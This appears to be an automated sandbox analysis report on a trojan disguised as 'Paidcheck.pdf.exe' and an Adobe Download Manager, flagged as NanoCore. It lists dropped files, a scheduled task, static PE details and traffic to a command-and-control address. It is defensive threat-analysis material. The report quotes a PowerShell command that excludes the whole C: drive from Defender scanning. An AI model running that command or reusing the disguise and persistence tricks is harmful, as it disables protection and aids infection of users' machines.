                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                          C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1310
                                                                          Entropy (8bit):5.109425792877704
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                                          MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                                          SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                                          SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                                          SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                                          Malicious:false
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):232
                                                                          Entropy (8bit):7.024371743172393
                                                                          Encrypted:false
                                                                          SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                                                                          MD5:32D0AAE13696FF7F8AF33B2D22451028
                                                                          SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                                                                          SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                                                                          SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                                                                          Malicious:false
                                                                          Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):8
                                                                          Entropy (8bit):3.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:Wn:Wn
                                                                          MD5:31760B024C72A6DB96428A87598EDAD6
                                                                          SHA1:26D9DC8EE0FEF7C95EDF8865F54A2477F5B2830D
                                                                          SHA-256:A41605947ADFFD965CFD275409AFE1E71BD692055EB86F3E60F3090D35389FA8
                                                                          SHA-512:2A9C2BB93EF3B50FDA97CACF51FF2228FFADDB33BEFD9062370D240141BE2D6121EFE244F7642926E51487D47BBC504C9B24CCDF9BB81C867974C07A4AFFC343
                                                                          Malicious:true
                                                                          Preview: pf.y.M.H
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bak
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):24
                                                                          Entropy (8bit):4.501629167387823
                                                                          Encrypted:false
                                                                          SSDEEP:3:9bzY6oRDIvYk:RzWDI3
                                                                          MD5:ACD3FB4310417DC77FE06F15B0E353E6
                                                                          SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
                                                                          SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
                                                                          SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
                                                                          Malicious:false
                                                                          Preview: 9iH...}Z.4..f..J".C;"a
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):5.320159765557392
                                                                          Encrypted:false
                                                                          SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
                                                                          MD5:BB0F9B9992809E733EFFF8B0E562CFD6
                                                                          SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
                                                                          SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
                                                                          SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
                                                                          Malicious:false
                                                                          Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):327432
                                                                          Entropy (8bit):7.99938831605763
                                                                          Encrypted:true
                                                                          SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                                                          MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                                                          SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                                                          SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                                                          SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                                                          Malicious:false
                                                                          Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):44
                                                                          Entropy (8bit):4.308768198567054
                                                                          Encrypted:false
                                                                          SSDEEP:3:oNWXp5cViE2J5xAI0L4A:oNWXp+N23f0L4A
                                                                          MD5:C9298EEE68389B937EFD1A5CE3DB10A2
                                                                          SHA1:2D299BA869C5386FB114AA6016DCB0607DFE98E0
                                                                          SHA-256:270C3AC669C532CE18737BFD72CB2981B65A6F08FF2B7EB5C9A4D8834AEB4E62
                                                                          SHA-512:1EF5C4AC44E1658DC8EA56F98B2714297D39937B9817E4F843D067F59D2778EC3D65E34DD467442F8B7D86248813E834D47A71D79EC3CE2D8E54B8A41BF19FDE
                                                                          Malicious:false
                                                                          Preview: C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):580096
                                                                          Entropy (8bit):6.242459409423084
                                                                          Encrypted:false
                                                                          SSDEEP:12288:UyVRMbXAPtBXomNFYmujpihOcn92JRVkxdGOcA1WJIq:UyVRxPtB3Cjpihvn+VkxIE1c
                                                                          MD5:CE32E8605ADB6C9BB2DCEE69FE887B46
                                                                          SHA1:2ACE1FB1E3523768003B61A4A79193214FFAFED9
                                                                          SHA-256:7E22F7F21E8798805234BE7AC26BAD65C1EDECB55B051343E0933A68041CE073
                                                                          SHA-512:674AD1360E6ED0E1C77865858C08950D6955F8A56544343E9414320470D80258E4FAD0D67EE64423CBC792BFBF2CD6FEE2C1806A837B61F62B7F71C10FE2D9FC
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 33%
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.................0......0........... ........@.. .......................@............@.....................................O........-................... ......|................................................ ............... ..H............text....... ...................... ..`.rsrc....-..........................@..@.reloc....... ......................@..B........................H.......H...L............M...x..........................................b.(.....s....}.....(....*....0..Z.......r...p..(....+.s....o....&.{....o....r...po....&r...p...(.....o....r...po....,...&.(......*..........PP........(....*..{....o....r#..po....&.{....o....r7..po....&*...0..........r...p.r...p..o......r...p(....-1.rK..p(....:.....rO..p(....:.....rS..p(....:....*.{....o....rW..po....&r...p..{....o....rq..po....&r...p..{......o....,..{....o....r...po....&*.{....o.....o....
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe:Zone.Identifier
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                          C:\Users\user\Documents\20210722\PowerShell_transcript.302494.fAvH+AQY.20210722093349.txt
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):5978
                                                                          Entropy (8bit):5.384226125292334
                                                                          Encrypted:false
                                                                          SSDEEP:96:BZ1hAZN4fqDo1ZUFZGhAZN4fqDo1ZE28srZahAZN4fqDo1ZYDiivZg:8
                                                                          MD5:AB8875BD5B3058B8423A6B26F392B5E7
                                                                          SHA1:9E45AFB3F5211658D59AC397698D841617DC7CF0
                                                                          SHA-256:49EDD3825A4186C0CB39926746C6392AF5D1D3905346C6D212A4E877AFFDC259
                                                                          SHA-512:B27C3C71B2C91FEDE5726FC99027E827847DB7F632999B9C42046023799DCBFF55311457E13F1AEFA8F92F0AC99D521FB2BE579FB5E35AF6C2C807651ED6B283
                                                                          Malicious:false
                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210722093401..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'..Process ID: 748..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210722093401..**********************..PS>Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'..**********************..Windows PowerShell transcript start
                                                                          \Device\ConDrv
                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1049
                                                                          Entropy (8bit):4.2989523990568035
                                                                          Encrypted:false
                                                                          SSDEEP:24:z3U3g4DO/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zEw4DBXZxo4ABV+SrUYE
                                                                          MD5:970EE6AEAB63008333D1D883327DA660
                                                                          SHA1:A71E19F66886B1888A183BA1777A23FABAE9822E
                                                                          SHA-256:D270D397EB3CF1173D25795834B240466EFEE213E11B1B31CDC101015AFFCAD9
                                                                          SHA-512:EB49AEE1B4524E6F15C08345A380D7D28DC845DEBA5408A7D034F2F7F5A652C8A2E2FF293BFB307DE87DCC2FAA111BA3BE8BEF9C4752A73DE1835DCD844D39BB
                                                                          Malicious:false
                                                                          Preview: Microsoft .NET Framework Assembly Registration Utility version 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information..

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):6.242459409423084
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:Paidcheck.pdf.exe
                                                                          File size:580096
                                                                          MD5:ce32e8605adb6c9bb2dcee69fe887b46
                                                                          SHA1:2ace1fb1e3523768003b61a4a79193214ffafed9
                                                                          SHA256:7e22f7f21e8798805234be7ac26bad65c1edecb55b051343e0933a68041ce073
                                                                          SHA512:674ad1360e6ed0e1c77865858c08950d6955f8a56544343e9414320470d80258e4fad0d67ee64423cbc792bfbf2cd6fee2c1806a837b61f62b7f71c10fe2d9fc
                                                                          SSDEEP:12288:UyVRMbXAPtBXomNFYmujpihOcn92JRVkxdGOcA1WJIq:UyVRxPtB3Cjpihvn+VkxIE1c
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.................0......0........... ........@.. .......................@............@................................

                                                                          File Icon

                                                                          Icon Hash:4e9292f2c88cd3cc

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x48c6ea
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                          Time Stamp:0xC8D6E03A [Sat Oct 10 03:15:06 2076 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:v4.0.30319
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8c6980x4f.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x2d0c.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x8c67c0x1c.text
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x8a6f00x8a800False0.74459012579data6.19707511101IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x8e0000x2d0c0x2e00False0.148522418478data3.29118714119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x920000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_ICON0x8e1000x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 134217728, next used block 117440512
                                                                          RT_GROUP_ICON0x906b80x14data
                                                                          RT_VERSION0x906dc0x430data
                                                                          RT_MANIFEST0x90b1c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Version Infos

                                                                          DescriptionData
                                                                          Translation0x0000 0x04b0
                                                                          LegalCopyrightCopyright 2019 Adobe Inc. All rights reserved.
                                                                          Assembly Version2.0.0.592
                                                                          InternalNameConsoleApp18709999999999999999.exe
                                                                          FileVersion2.0.0.592
                                                                          CompanyNameAdobe Inc
                                                                          LegalTrademarks
                                                                          CommentsAdobe Download Manager
                                                                          ProductNameAdobe Download Manager
                                                                          ProductVersion2.0.0.592
                                                                          FileDescriptionAdobe Download Manager
                                                                          OriginalFilenameConsoleApp18709999999999999999.exe

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          07/22/21-09:33:52.108416TCP2025019ET TROJAN Possible NanoCore C2 60B497042018192.168.2.3217.138.212.57

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jul 22, 2021 09:33:50.806400061 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:51.963380098 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:51.963871002 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:52.108416080 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:53.019690990 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:53.019798040 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:53.281886101 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:53.282010078 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:53.799725056 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:53.799973965 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:54.673887014 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:54.712150097 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:55.432821035 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.470251083 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.487173080 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.487313032 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:55.514666080 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.542630911 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.542725086 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:55.568679094 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.598782063 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.598872900 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:55.638338089 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.673640966 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.673707962 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:55.700371027 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.727716923 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.727771997 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.197894096 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.224483013 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.224617958 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.250488997 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.273921013 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.273997068 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.292437077 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.328677893 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.328763008 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.359198093 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.386095047 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.386173010 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.408067942 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.432426929 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.433077097 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.453711987 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.488806963 CEST201849704217.138.212.57192.168.2.3
